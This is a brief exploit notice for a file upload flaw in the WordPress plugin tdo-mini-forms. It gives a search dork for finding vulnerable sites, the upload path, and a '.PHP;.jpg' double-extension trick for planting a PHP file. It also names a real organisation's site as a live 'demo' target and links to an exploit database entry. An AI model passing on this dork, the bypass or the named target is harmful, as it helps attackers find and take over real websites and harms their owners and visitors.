Bug file upload di "wordpress Plugin tdo-mini-forms"

[ type attack ]
tamper data

[ dork ]
inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload

[ link upload file ]
site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg

[ example ]
wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg

[ demo ]
http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=

[ details ]
http://1337day.com/exploit/19776